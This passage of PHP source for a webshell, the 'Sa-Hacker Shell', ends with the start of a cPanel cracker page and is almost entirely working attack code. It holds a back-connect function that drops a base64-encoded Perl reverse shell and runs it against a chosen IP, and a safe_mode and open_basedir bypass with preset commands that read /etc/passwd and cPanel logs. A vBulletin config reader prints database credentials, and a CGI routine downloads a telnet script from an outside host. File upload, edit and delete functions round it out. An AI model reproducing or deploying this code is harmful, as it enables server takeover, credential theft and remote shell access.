  716. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  717. print "<tr><td width=50%><div align=left>";
  718. print $st.$c1."<div><b><center>Using imap() function</div>";
  719. print $ec.$c2.$sf."&nbsp;";
  720. input("text","rimap",$nscdir,75);
  721. input("hidden","scdir",$nscdir,0);print " ";
  722. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  723. print "</td><td height=20% width=50%><div align=right>";
  724. print $st.$c1."<div><b><center>Using id() function</div>";
  725. print $ec.$c2.$sf."&nbsp;";
  726. input("text","rid",$nscdir,75);
  727. input("hidden","scdir",$nscdir,0);print " ";
  728. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  729. print "</td></tr></table>";
  730. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  731. print "<tr><td width=50%><div align=left>";
  732. print $st.$c1."<div><b><center>Using plugin() function</div>";
  733. print $ec.$c2.$sf."&nbsp;";
  734. input("text","plugin",$nscdir,75);
  735. input("hidden","scdir",$nscdir,0);print " ";
  736. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  737. print "</td><td height=20% width=50%><div align=right>";
  738. print $st.$c1."<div><b><center>Using symlink() function</div>";
  739. print $ec.$c2.$sf."&nbsp;";
  740. input("text","sym",$nscdir,75);
  741. input("hidden","scdir",$nscdir,0);print " ";
  742. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  743. print "</td></tr></table>";
  744. delm(": Unzend Config :");
  745. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  746. print "<tr><td width=50%><div align=left>";
  747. print $st.$c1."<div><b><center>Connect To Functions Of Config</div>";
  748. print $ec.$c2.$sf."&nbsp;";
  749. input("text","func",$nscdir,75);
  750. input("hidden","scdir",$nscdir,0);print " ";
  751. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  752. print "</td></tr></table>";
  753. ?><?
  754. print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";
  755. print"<tr><td><font size=2 face=tahoma>";
  756. print"<center>Coder By GeNiUs HaCkEr <br>[ Team Hack15 :: Go to : <a target='_blank' href='http://www.Hack15.com'>Http://Hack15.com</a> ]";
  757. print"</font></td></tr></table>";
  758. ?>
  759. <PHP
  760.  
  761. }
  762.  
  763. //Vbulletin config decoder
  764. function edecode()
  765. {
  766. ?>    
  767. <?
  768. /*================*\
  769. || ############### ||
  770. || # H-T oM[3]Ga # ||
  771. || ############### ||
  772. \*================*/
  773. ?>
  774. <title>ionCube & Zend Decoder</title>
  775. <form name="form" action="?a=decode" method="post">
  776. <tr><td><input name="file" value="config.php" /></td></tr>
  777. <input type="submit" name="Connect" value="Decode" />
  778. <br>
  779. <?
  780. $a = $_GET['a'];
  781. if($a=='decode' && isset($_POST['file']))
  782. {
  783. $file = $_POST['file'];
  784. include $file;
  785. ?>
  786. <? echo $config['MasterServer']['servername']."\n"; ?><br>
  787. <? echo $config['Database']['dbname']."\n"; ?><br>
  788. <? echo $config['MasterServer']['username']."\n"; ?><br>
  789. <? echo $config['MasterServer']['password']."\n"; ?><br>
  790. <?
  791. }
  792. if ($a=='config')
  793. {
  794. }
  795. ?>
  796. <?PHP
  797.  
  798. }
  799.  
  800. //Php 4 Back
  801. function ephp4()
  802. {
  803.     @unlink('.htaccess');
  804. $H = fopen('.htaccess','w+');
  805. $Str = '<Files *.php>
  806.   ForceType application/x-httpd-php4
  807. </Files>';
  808. if(fwrite($H,$Str)){
  809. echo "[+] Evil File Created Succes ! \n";
  810. }
  811. fclose($H);
  812. break;
  813.  
  814. }
  815.  
  816. //Php 4.x Bypass
  817. function e444()
  818. {
  819.  
  820. ?>
  821. <?
  822. /*
  823. www.securitywall.org
  824. Safe Mode Command Execution Shell
  825. */
  826. function safeshell($komut)
  827. {
  828. ini_restore("safe_mode");
  829. ini_restore("open_basedir");
  830.  $res = '';
  831.  if (!empty($komut))
  832.  {
  833. if(function_exists('exec'))
  834. {
  835.  @exec($komut,$res);
  836.  $res = join("\n",$res);
  837. }
  838. elseif(function_exists('shell_exec'))
  839. {
  840.  $res = @shell_exec($komut);
  841. }
  842. elseif(function_exists('system'))
  843. {
  844.  @ob_start();
  845.  @system($komut);
  846.  $res = @ob_get_contents();
  847.  @ob_end_clean();
  848. }
  849. elseif(function_exists('passthru'))
  850. {
  851.  @ob_start();
  852.  @passthru($komut);
  853.  $res = @ob_get_contents();
  854.  @ob_end_clean();
  855. }
  856. elseif(@is_resource($f = @popen($komut,"r")))
  857. {
  858. $res = "";
  859. while(!@feof($f)) { $res .= @fread($f,1024); }
  860. @pclose($f);
  861. }
  862.  }
  863.  return $res;
  864. }
  865. echo "<b><font color=blue>Safe Mode Command Execution Bypass Exploit</font></b><br>";
  866. print_r('
  867. <pre>
  868. <form method="POST" action="">
  869. <b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Calistir" type="submit">
  870. </form>
  871. <form method="POST" action="">
  872. <b><font color=blue>Hazir Komutlar :=) :</font><select size="1" name="liz0">
  873. <option value="cat /etc/passwd">/etc/passwd</option>
  874. <option value="netstat -an | grep -i listen">Tum Acikk Portalari Gor</option>
  875. <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
  876. <option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
  877. <option value="cat /etc/hosts">/etc/hosts</option>
  878. <option value="cat /etc/named.conf">/etc/named.conf</option>
  879. <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
  880. <option value="ls -la /etc/virtual">ls -la /etc/virtual</option>
  881. <option value="ls -la /etc/vdomainaliases">ls -la /etc/vdomainaliases</option>
  882. <option value="ls -la /etc/v------s">ls -la /etc/v------s</option>
  883. <option value="find PATH -perm 777 -type d">Yzilabilir Dizinler</option>
  884. <option value="cat /etc/passwd | grep cpanel > 1;cat 1">p1</option>
  885. <option value="cut -d: -f 6 1 >2;cat 2">p2</option>
  886. </select> <input type="submit" value="Sonuc">
  887. </form>
  888. </pre>
  889. ');
  890. ini_restore("safe_mode");
  891. ini_restore("open_basedir");
  892. if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
  893. if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
  894. $uid=safeshell('id');
  895. $server=safeshell('uname -a');
  896. echo "<pre><h4>";
  897. echo "<b><font color=red>Bilgiler:</font></b>:$uid<br>";
  898. echo "<b><font color=red>Server</font></b>:$server<br>";
  899. echo "<b><font color=red>Komut Sonuclari:</font></b><br>";
  900. if($_POST["baba"]!= "") { echo $liz0; }
  901. if($_POST["liz0"]!= "") { echo $liz0zim; }
  902. echo "</h4></pre>";
  903. ?>
  904. <?php
  905. }
  906.  
  907.  
  908. //Perl cgi
  909. function ecgi()
  910. {
  911.  
  912. $kokdosya = ".htaccess";
  913.  
  914. $dosya_adi = "$kokdosya";
  915. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açilamadi!");
  916. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  917.  
  918. AddType application/x-httpd-cgi .izocin
  919.  
  920. AddHandler cgi-script .izocin
  921. AddHandler cgi-script .izocin";    
  922. fwrite ( $dosya , $metin ) ;
  923. fclose ($dosya);
  924.  
  925. ?>
  926. <?php
  927.  
  928. $file = fopen("izo.izocin" ,"w+");
  929.  
  930. $sa=file_get_contents('http://www.rohitab.com/cgiscripts/cgitelnet.txt');
  931.  
  932. $write = fwrite ($file ,$sa);
  933.  
  934. fclose($file);
  935.  
  936. if ($write) {
  937.  
  938. echo "The File Was Created Successfuly.</br>";
  939.  
  940. }
  941. else {echo'"error"';}
  942.  
  943. $chm = chmod("izo.izocin" , 0755);
  944.  
  945. if ($chm == true){
  946.     echo "chmoded the file to 755";
  947. }else{
  948.     echo "sorry file didn't chmoded";
  949. }
  950. ?>
  951. <?php
  952. }
  953.  
  954. //ln -s bypass
  955. function elns()
  956. {
  957.  
  958. $kokdosya = ".htaccess";
  959.  
  960. $dosya_adi = "$kokdosya";
  961. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açilamadi!");
  962. $metin = "Options +FollowSymLinks
  963. DirectoryIndex klas???r ad???";    
  964. fwrite ( $dosya , $metin ) ;
  965. fclose ($dosya);
  966.  
  967. }
  968.  
  969. //Apachi Bypass
  970. function eapachi()
  971. {
  972.  
  973. $kokdosya = ".htaccess";
  974.  
  975. $dosya_adi = "$kokdosya";
  976. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açilamadi!");
  977. $metin = "AddType application/x-httpd-php4 .php";    
  978. fwrite ( $dosya , $metin ) ;
  979. fclose ($dosya);
  980.    
  981.  
  982. }
  983.  
  984.  
  985. //Working with MySQL
  986. function emysql()
  987. {
  988.     $cquery = $_POST['query'];
  989.     $querys = @explode(';',$cquery);
  990.     $dbhost = $_POST['dbhost']?$_POST['dbhost']:"localhost";
  991.     $dbport = $_POST['dbport']?$_POST['dbport']:"3306";
  992.     $dbuser = $_POST['dbuser'];
  993.     $dbpass = $_POST['dbpass'];
  994.     $dbname = $_POST['dbname'];
  995.     if ($cquery  == "") {
  996.         $cquery  = "-- SHOW DATABASES;\n-- SHOW TABLES FROM <database>;\n-- SHOW COLUMNS FROM <table>;";
  997.     }
  998.     echo '
  999.    <center><h3> Working with MySQL </h3></center>
  1000.    <center>
  1001.    <form method="POST" action="">
  1002.    <input type="hidden" name="id" value="mysql">
  1003.    DBHost: <input type="text" size="8" name="dbhost" value="',$dbhost,'" class="input" />&nbsp;
  1004.    DBPort: <input type="text" size="5" name="dbport" value="',$dbport,'" class="input" />&nbsp;
  1005.    DBUser: <input type="text" size="10" name="dbuser" value="',$dbuser,'" class="input" />&nbsp;
  1006.    DBPass: <input type="text" size="10" name="dbpass" value="',$dbpass,'" class="input" />&nbsp;
  1007.    DBName: <input type="text" size="10" name="dbname" value="',$dbname,'" class="input" /><br><br>
  1008.    <textarea name ="query" rows="7" cols=90 class="textarea">',$cquery,'</textarea><br><br>
  1009.    <input type="submit" name="go" value="     Go     " class="button">
  1010.    </form>';
  1011.     if($_POST['go']) {
  1012.         $connect = @mysql_connect($dbhost.":".$dbport, $dbuser, $dbpass);
  1013.  
  1014.         if (!$connect)    { echo '<textarea rows=3 cols=80 class="textarea">Could not connect: ',mysql_error(),'</textarea>';    }
  1015.         else {
  1016.             @mysql_select_db($dbname, $connect);
  1017.             echo '<div style="overflow:auto; height:400px;width:1000px;">';
  1018.             foreach($querys as $num=>$query){
  1019.                 if(strlen($query)>5){
  1020.                     echo '<font face=Verdana size=-2 color=orange><b>Query#'.$num.' : '.htmlspecialchars($query).'</b></font><br>';
  1021.                     $res = @mysql_query($query,$connect);
  1022.                     $error = @mysql_error($connect);
  1023.                     if($error) { echo '<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>'.$error.'</b></font></td></tr></table><br>'; }
  1024.                     else {
  1025.                         if (@mysql_num_rows($res) > 0){
  1026.                             $sql2 = $sql = $keys = $values = '';
  1027.                             while (($row = @mysql_fetch_assoc($res))){
  1028.                                 $keys = @implode('&nbsp;</b></font></td><td bgcolor=blue><font color=white face=Verdana size=-2><b>&nbsp;', @array_keys($row));
  1029.                                 $values = @array_values($row);
  1030.                                 foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
  1031.                                 $values = @implode('&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;',$values);
  1032.                                 $sql2 .= '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
  1033.                             }
  1034.                             echo '<table width=100%>';
  1035.                             $sql  = '<tr><td bgcolor=blue><font face=Verdana color=white size=-2><b>&nbsp;'.$keys.'&nbsp;</b></font></td></tr>';
  1036.                             $sql .= $sql2;
  1037.                             echo $sql;
  1038.                             echo '</table><br>';
  1039.                         }
  1040.                         else { if(($rows = @mysql_affected_rows($connect))>=0) { echo '<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>'.$rows.'</b></font></td></tr></table><br>'; } }
  1041.                     }
  1042.                     @mysql_free_result($res);
  1043.                 }
  1044.             }
  1045.             echo '</div><br>';
  1046.             @mysql_close($connect);
  1047.         }
  1048.     }
  1049. }
  1050.  
  1051.  
  1052. //Back Connect
  1053. function eback()
  1054. {
  1055.     $bc_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZ---YWAiO2Vj
  1056. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
  1057. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
  1058. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
  1059. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
  1060. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
  1061. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  1062.     echo '
  1063.    <p align="center"><font size="5"><b> Back Connecting </b></font></p>
  1064.    <p align="center"><font color="#DD8008">Run NetCat on your machine:</font><i><font color="#FF0000"> nc -l -p 1542</font></i>
  1065.    </p><br><hr><br><p align="center"><font color="#DD8008">Then input your IP and Port</font></p>
  1066.    <div align="center"><form method="POST" action="">
  1067.    <input type="text" name="pip" value="',$_SERVER['REMOTE_ADDR'],'" class="input" /> :
  1068.    <input type="text" name="pport" size="5" value="1542" class="input" /> <br><br>
  1069.    <input type="text" name="ppath" value="/tmp" class="input" /><br><br>
  1070.    <input type="submit" value=" Connect " class="button" />
  1071.    </form></div>';
  1072.     $pip=$_POST['pip'];        $pport=$_POST['pport'];
  1073.     if ($pip <> '') {
  1074.         $fp=fopen($_POST['ppath'].DS.rand(0,10).'bc_perl_enhack.pl', 'w');
  1075.         if (!$fp){
  1076.             $result = 'Error: couldn\'t write file to open socket connection';
  1077.         } else {
  1078.             @fputs($fp,@base64_decode($bc_perl));
  1079.             fclose($fp);
  1080.             $result = ex('perl '.$_POST['ppath'].'/bc_perl_enhack.pl '.$pip.' '.$pport.' &');
  1081.         }
  1082.     }
  1083. }
  1084.  
  1085.  
  1086. //File Edit
  1087. function fedit()
  1088. {
  1089.     $fedit=$_GET['fedit'];
  1090.     if(is_file($fedit)) {
  1091.         if ($fedit != "" ){
  1092.             $fedit=realpath($fedit);
  1093.             $lines = file($fedit);
  1094.             echo '
  1095.            <center><br><form action="" method="POST">
  1096.            <textarea name="savefile" rows="33" cols="100">' ;
  1097.  
  1098.             foreach ($lines as $line_num => $line) {
  1099.                 echo htmlspecialchars($line);
  1100.             }
  1101.             echo '
  1102.            </textarea><br><br>
  1103.            <input type="text" name="filepath"  size="60" value="',$fedit,'" class="input" />&nbsp;
  1104.            <input type="submit" value=" Save " class="button" /></form>';
  1105.             $savefile=stripslashes($_POST['savefile']);
  1106.             $filepath=realpath($_POST['filepath']);
  1107.             if ($savefile <> "") {
  1108.                 $fp=@fopen("$filepath","w+");
  1109.                 if($fp){
  1110.                     fwrite($fp,"") ;
  1111.                     fwrite($fp,$savefile) ;
  1112.                     fclose($fp);
  1113.                     echo '<script language="javascript"> alert("File Saved!")</script>';
  1114.                 } else {
  1115.                     echo '<script language="javascript"> alert("Save Failed!")</script>';
  1116.                 }
  1117.                 echo '<script language="javascript"> window.location = "http://'.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].'"</script>';
  1118.             }
  1119.             exit();
  1120.         }
  1121.     }
  1122.     else {
  1123.         echo '<u>',$fedit,'</u> is not file. <br />
  1124.        <a href="javascript:history.go(-1)"><-- back</a>
  1125.        ';
  1126.     }
  1127. }
  1128.  
  1129.  
  1130. // Execute
  1131. function ex($param) {
  1132.     $res = '';
  1133.     if (!empty($param)){
  1134.         if(function_exists('exec'))    {
  1135.             @exec($param,$res);
  1136.             $res = join("\n",$res);
  1137.         }
  1138.         elseif(function_exists('shell_exec'))    {
  1139.             $res = @shell_exec($param);
  1140.         }
  1141.         elseif(function_exists('system'))    {
  1142.             @ob_start();
  1143.             @system($param);
  1144.             $res = @ob_get_contents();
  1145.             @ob_end_clean();
  1146.         }
  1147.         elseif(function_exists('passthru'))    {
  1148.             @ob_start();
  1149.             @passthru($param);
  1150.             $res = @ob_get_contents();
  1151.             @ob_end_clean();
  1152.         }
  1153.         elseif(@is_resource($f = @popen($param,"r")))    {
  1154.             $res = "";
  1155.             while(!@feof($f)) { $res .= @fread($f,1024); }
  1156.             @pclose($f);
  1157.         }
  1158.     }
  1159.     return $res;
  1160. }
  1161.  
  1162. //Upload File
  1163. $rpath=@$_POST['Fupath'];
  1164. if ($rpath <> "") {
  1165.     $uploadfile = $rpath."/" . $_FILES['userfile']['name'];
  1166.     if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
  1167.         echo '<script language="javascript"> alert("\:D Upload successfully!")</script>';
  1168.     } else {
  1169.         echo '<script language="javascript"> alert("\:( Upload Failed!")</script>';
  1170.     }
  1171. }
  1172.  
  1173. //Delete file
  1174. $frpath=@$_GET['fdelete'];
  1175.  
  1176. function rmdirr($dirname)
  1177. {
  1178.     // Sanity check
  1179.     if (!file_exists($dirname)) {
  1180.         return false;
  1181.     }
  1182.  
  1183.     // Simple delete for a file
  1184.     if (is_file($dirname) || is_link($dirname)) {
  1185.         return unlink($dirname);
  1186.     }
  1187.  
  1188.     // Loop through the folder
  1189.     $dir = dir($dirname);
  1190.     while (false !== $entry = $dir->read()) {
  1191.         // Skip pointers
  1192.         if ($entry == '.' || $entry == '..') {
  1193.             continue;
  1194.         }
  1195.  
  1196.         // Recurse
  1197.         rmdirr($dirname . DIRECTORY_SEPARATOR . $entry);
  1198.     }
  1199.  
  1200.     // Clean up
  1201.     $dir->close();
  1202.     return rmdir($dirname);
  1203. }
  1204.  
  1205. if ($frpath <> "") {
  1206.     if(rmdirr($frpath)) {
  1207.         echo '<script language="javascript"> alert("Done! Press F5 to refresh")</script>';
  1208.     } else {
  1209.         echo '<script language="javascript"> alert("Fail! Press F5 to refresh")</script>';
  1210.     }
  1211.     echo '<script language="javascript"> history.back(2)</script>';
  1212.     exit(0);
  1213. }
  1214. ?>
  1215.  
  1216. <html>
  1217. <head>
  1218. <meta http-equiv="Content-Language" content="en-us">
  1219. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  1220. <title>:: Sa-Hacker Shell  ::</title>
  1221. <style>
  1222. <!--
  1223. body {
  1224.     font-family: Tahoma; font-size: 8pt; color:#00FF00;
  1225.     background-color:#000;
  1226. }
  1227. .td {
  1228.     font-size:80%;
  1229. }
  1230. a:link {
  1231.     text-decoration: none;
  1232.     color: #0080FF
  1233. }
  1234. a:visited {
  1235.     text-decoration: none;
  1236.     color: #0080FF
  1237. }
  1238. a:active {
  1239.     text-decoration: none;
  1240.     color: #0080FF
  1241. }
  1242. a:hover {
  1243.     text-decoration: underline overline;
  1244.     color: #FF0000
  1245. }
  1246.  
  1247. .input {
  1248.     border:  1px solid #0c9904 ;
  1249.     BACKGROUND-COLOR: #333333;
  1250.     font: 10pt tahoma;
  1251.     color: #ffffff;
  1252. }
  1253.  
  1254. .button {
  1255.     font-size: 13px;
  1256.     color:#0c9904;
  1257.     BACKGROUND-COLOR: #333333;
  1258.     border:  1px solid #0c9904;
  1259. }
  1260.  
  1261. .textarea {
  1262.     border:  1px solid #0c9904 ;
  1263.     BACKGROUND-COLOR: #333333;
  1264.     font: Fixedsys bold;
  1265.     color: #ffffff;
  1266. }
  1267.  
  1268. #phpinfo {
  1269.     width:80%;
  1270.     font-size:80%;
  1271.     padding-left10px;
  1272. }
  1273. #phpinfo table ,
  1274. #phpinfo td ,
  1275. #phpinfo tr {
  1276.     border:1px solid #9fe3a2;
  1277. }
  1278. #phpinfo pre {}
  1279. #phpinfo a:link {
  1280.     color:red;
  1281. }
  1282. #phpinfo a:hover {}
  1283. #phpinfo table {}
  1284. #phpinfo .center {}
  1285. #phpinfo .center table {}
  1286. #phpinfo .center th {}
  1287. #phpinfo td, th {}
  1288. #phpinfo h1 {
  1289.     font-size:120%;
  1290. }
  1291. #phpinfo h2 {
  1292.     text-decoration:underline;
  1293.     color:#75d584;
  1294. }
  1295. #phpinfo .p {
  1296.  font-size:90%;
  1297.  color:red;
  1298. }
  1299. #phpinfo .e {
  1300.     font-size:80%;
  1301. }
  1302. #phpinfo .h {
  1303. }
  1304. #phpinfo .v {
  1305.     font-size:75%;
  1306.     color:#3e9e25;
  1307. }
  1308. #phpinfo .vr {}
  1309. #phpinfo img {}
  1310. #phpinfo hr {}
  1311. -->
  1312. </style>
  1313. </head>
  1314.  
  1315. <body>
  1316. <?php
  1317. error_reporting(E_ERROR | E_WARNING | E_PARSE);
  1318.  
  1319.  
  1320. // Change mode
  1321. $fchmod=$_GET['fchmod'];
  1322. if ($fchmod <> "" ){
  1323.     $fchmod=realpath($fchmod);
  1324.     echo '<center><font size="3"><br>
  1325.    Chang mode ',$fchmod,'<br>
  1326.    <form method="POST" action=""><br>
  1327.    <br>
  1328.    <input type="text" name="mode" size="4" class="input" />&nbsp;
  1329.    <input type="submit" value="chmod" class="button" />
  1330.    </form><br>';
  1331.     $mode=$_POST['mode'];
  1332.     if ($mode != ""){
  1333.         if(chmod($fchmod , $mode)) {
  1334.             echo "Successfully";
  1335.         } else {
  1336.             echo "Permission denied";
  1337.         }
  1338.     }
  1339.     echo '</font>';
  1340.     exit();
  1341. }
  1342. ?>
  1343.  
  1344. <div align="center">
  1345.     <p align="center">
  1346.         <font face=Webdings size=10><b>!</b></font>
  1347.         <SPAN style="FONT-SIZE: 23pt; COLOR: #00CCFF; FONT-FAMILY: Impact">&nbsp;Sa-Hacker Shell&nbsp;</SPAN>
  1348.         <font face=Webdings size=10><b>!</b></font>
  1349.         <br/>
  1350.     </p>
  1351.     <table border="1" width="98%" style="border: 1px solid #0080FF" cellspacing="0" cellpadding="0" height="600">
  1352.         <tr>
  1353.             <td valign="top" rowspan="2">
  1354.                 <p align="center"><b>
  1355.    
  1356.                 </p>
  1357.                 <p align="center">=====[~]=====</p>
  1358.                 <p align="center"><b>
  1359.                 <font face="Tahoma" size="2" color="#0080FF">
  1360.                     <a href="">File Manager</a>
  1361.                 </font></b></p>
  1362.  
  1363.                 <p align="center"><b>
  1364.                 <font face="Tahoma" size="2" color="#0080FF">
  1365.                     <a href="">Web Command</a>
  1366.                 </font></b></p>
  1367.  
  1368.                 <p align="center"><b>
  1369.                 <font face="Tahoma" size="2" color="#0080FF">
  1370.                     <a href="">PHP Evaluator</a>
  1371.                 </font></b></p>
  1372.  
  1373.                 <p align="center"><b>
  1374.                 <font face="Tahoma" size="2" color="#0080FF">
  1375.                     <a href="">Php 5.2.9 Bypass</a>
  1376.                 </font></b></p>
  1377.  
  1378.                 <p align="center"><b>
  1379.                 <font face="Tahoma" size="2" color="#0080FF">
  1380.                     <a href="">Safe Modu Offla</a>
  1381.                 </font></b></p>
  1382.  
  1383.                 <p align="center"><b>
  1384.                 <font face="Tahoma" size="2" color="#0080FF">
  1385.                     <a href="">Openbasedir Bypass</a>
  1386.                 </font></b></p>
  1387.  
  1388.                 <p align="center"><b>
  1389.                 <font face="Tahoma" size="2" color="green">
  1390.                     <a href="">Vbulletin config decoder</a>
  1391.                 </font></b></p>
  1392.  
  1393.                 <p align="center"><b>
  1394.                 <font face="Tahoma" size="2" color="#0080FF">
  1395.                     <a href="">Php 4 Back</a>
  1396.                 </font></b></p>
  1397.  
  1398.                 <p align="center"><b>
  1399.                 <font face="Tahoma" size="2" color="#0080FF">
  1400.                     <a href="">Php 4.4.x Bypass</a>
  1401.                 </font></b></p>
  1402.  
  1403.                 <p align="center"><b>
  1404.                 <font face="Tahoma" size="2" color="#0080FF">
  1405.                     <a href="">Perl cgi</a>
  1406.                 </font></b></p>
  1407.  
  1408.                 <p align="center"><b>
  1409.                 <font face="Tahoma" size="2" color="#0080FF">
  1410.                     <a href="">ln -s bypass</a>
  1411.                 </font></b></p>
  1412.  
  1413.                 <p align="center"><b>
  1414.                 <font face="Tahoma" size="2" color="#0080FF">
  1415.                     <a href="">Apachi Bypass</a>
  1416.                 </font></b></p>
  1417.  
  1418.                 <p align="center"><b>
  1419.                 <font face="Tahoma" size="2" color="#0080FF">
  1420.                     <a href="">Nitrojen Bombasi</a>
  1421.                 </font></b></p>
  1422.  
  1423.                 <p align="center"><b>
  1424.                 <font face="Tahoma" size="2" color="#0080FF">
  1425.                     <a href="">Cpanel Brute</a>
  1426.                 </font></b></p>
  1427.  
  1428.                 <p align="center"><b>
  1429.                 <font face="Tahoma" size="2" color="#0080FF">
  1430.                     <a href="">Back Connect</a>
  1431.                 </font></b></p>
  1432.  
  1433.                 <p align="center"><b>
  1434.                 <font face="Tahoma" size="2" color="#0080FF">
  1435.                     <a href="">MySQL Query</a>
  1436.                 </font></b></p>
  1437.  
  1438.                 <p align="center"><b>
  1439.                 <font face="Tahoma" size="2" color="#0080FF">
  1440.                     <a href="">Server Infos</a>
  1441.                 </font></b></p>
  1442.  
  1443.                 <p align="center">=====[~]=====</p>
  1444.  
  1445.                 <p align="center"><b>
  1446.                 <font face="Tahoma" size="2" color="#0080FF">
  1447.  
  1448.                 </font></b></p>
  1449.             </td>
  1450.             <td valign="top" height="500" width="85%" style="border: 1px solid #0080FF" align="left">
  1451.             <?php
  1452.             // swich to function called base on id
  1453.             $cmdid = $_GET['id'];
  1454.             switch ($cmdid) {
  1455.                 // File Manager
  1456.                 case 'fm':
  1457.                     fileman ();
  1458.                     break;
  1459.                 // Command Line
  1460.                 case 'cmd':
  1461.                     wcom();
  1462.                     break;
  1463.                 // PHP Eval
  1464.                 case 'eval':
  1465.                     eeval();
  1466.                     break;
  1467.                 // Php 5.2.9 Bypass
  1468.                 case 'izo':
  1469.                     eizo();
  1470.                     break;
  1471.                 // Safe Modu Offla
  1472.                 case 'priv8':
  1473.                     epriv8();
  1474.                     break;
  1475.                 // Openbasedir Bypass
  1476.                 case 'obypass':
  1477.                     eobypass();
  1478.                     break;
  1479.                 // Vbulletin config decoder
  1480.                 case 'decode':
  1481.                     edecode();
  1482.                     break;                
  1483.                 // Php 4 Back
  1484.                 case 'php4':
  1485.                     ephp4();
  1486.                     break;
  1487.                 // Php 4.4.x Bypass
  1488.                 case '444':
  1489.                     e444();
  1490.                     break;
  1491.                 // Perl cgi
  1492.                 case 'cgi':
  1493.                     ecgi();
  1494.                     break;
  1495.                 // ln -s bypass
  1496.                 case 'lns':
  1497.                     elns();
  1498.                     break;
  1499.                 // Apachi Bypass
  1500.                 case 'apachi':
  1501.                     eapachi();
  1502.                     break;
  1503.                                 // Work with MySQL
  1504.                 case 'mysql':
  1505.                     emysql();
  1506.                     break;
  1507.                 // Back connect
  1508.                 case 'bcon':
  1509.                     eback();
  1510.                     break;
  1511.                 // File Edit
  1512.                 case 'fedit':
  1513.                     fedit();
  1514.                     break;
  1515.                 // Php Info
  1516.                 case 'info':
  1517.                     info();
  1518.                     break;
  1519.                 // Default
  1520.                 default: def();
  1521.             }
  1522.             //*******************************************************
  1523.  
  1524.             ?>
  1525.             </td>
  1526.         </tr>
  1527.         <tr>
  1528.             <td style="border: 1px solid #0080FF">
  1529.             <p align="center">
  1530.            
  1531.            
  1532.             <font color="#FF0000" size="2"><b>:::::::::::::::: [ Sa-Hacker Security Team</a> :: ] :::::::::::::::: </b></font>
  1533.            
  1534.             </p></td>
  1535.            
  1536.         </tr>
  1537.     </table>
  1538. </div>
  1539. </font>
  1540. </body>
  1541. </html>
  1542. <?php
  1543. $mode="cp";//????????????.
  1544. if($_REQUEST['panel']!=$mode)
  1545. {
  1546.    echo "<iframe src=cp width=100% height=100% frameborder=0></iframe> ";
  1547. exit;
  1548. }
  1549. ?>
  1550. <html>
  1551. <head>
  1552. <sakincali kodsakincali kodsakincali kodsakincali kod sakincali kodsakincali kodsakincali kodsakincali kodsakincali kodsakincali kodsakincali kodsakincali kodsakincali kodsakincali kod="Content-Language" content="en-us">
  1553. </head>
  1554. <title>Aria cPanel cracker version : 1.0</title>
  1555. <style>
  1556. body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
  1557. input,
  1558. .kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
  1559. button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  1560. body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
